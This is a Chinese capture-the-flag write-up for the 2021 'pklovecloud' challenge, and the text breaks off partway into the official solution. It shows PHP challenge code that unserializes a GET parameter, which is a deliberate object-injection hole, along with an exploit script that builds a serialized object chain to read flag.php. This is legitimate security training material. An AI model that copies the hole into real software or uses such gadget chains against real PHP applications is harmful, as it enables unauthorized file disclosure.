目录
[第五空间 2021]yet_another_mysql_injection
[第五空间 2021]pklovecloud
<?php
include 'flag.php';
class pkshow
{
function echo_name()
{
return "Pk very safe^.^";
}
}
class acp
{
protected $cinder;
public $neutron;
public $nova;
function __construct()
{
$this->cinder = new pkshow;
}
function __toString()
{
if (isset($this->cinder))
return $this->cinder->echo_name();
}
}
class ace
{
public $filename;
public $openstack;
public $docker;
function echo_name()
{
$this->openstack = unserialize($this->docker);
$this->openstack->neutron = $heat;
if($this->openstack->neutron === $this->openstack->nova)
{
$file = "./{$this->filename}";
if (file_get_contents($file))
{
return file_get_contents($file);
}
else
{
return "keystone lost~";
}
}
}
}
if (isset($_GET['pks']))
{
$logData = unserialize($_GET['pks']);
echo $logData;
}
else
{
highlight_file(__file__);
}
?>
exp 很好构造 就是要绕过两个点:
$this->openstack = unserialize($this->docker);
$this->openstack->neutron = $heat;
if($this->openstack->neutron === $this->openstack->nova)
关键代码在这里, 如果 这里的docker为空的时候, this -> OpenStack 自然为空对象,则$this->openstack->neutron === $this->openstack->nova
两侧都为null自然可绕过。.
测试代码:
<?php
$a="";
$b=unserialize($a);
var_dump($b);//bool(false)
var_dump($a->sss);//报异常并返回null
var_dump($a->ttt->xxx===null);//bool(true)
?>
可以看见以上代码。 $b对象的属性都为空。
构造exp:
<?php
class acp
{
public $cinder;
public $neutron;
public $nova;
}
class ace
{
public $filename;
public $openstack;
public $docker;
}
$b=new acp();
$c=new ace();
$b->cinder=$c;
$c->docker='';
$c->filename='flag.php';
echo urlencode(serialize($b));
?>
没跑出来,但是对照了wp 也没问题。
官方解:
<?php
class acp
{
protected $cinder;
public $neutron;
public $nova;
function __construct()
{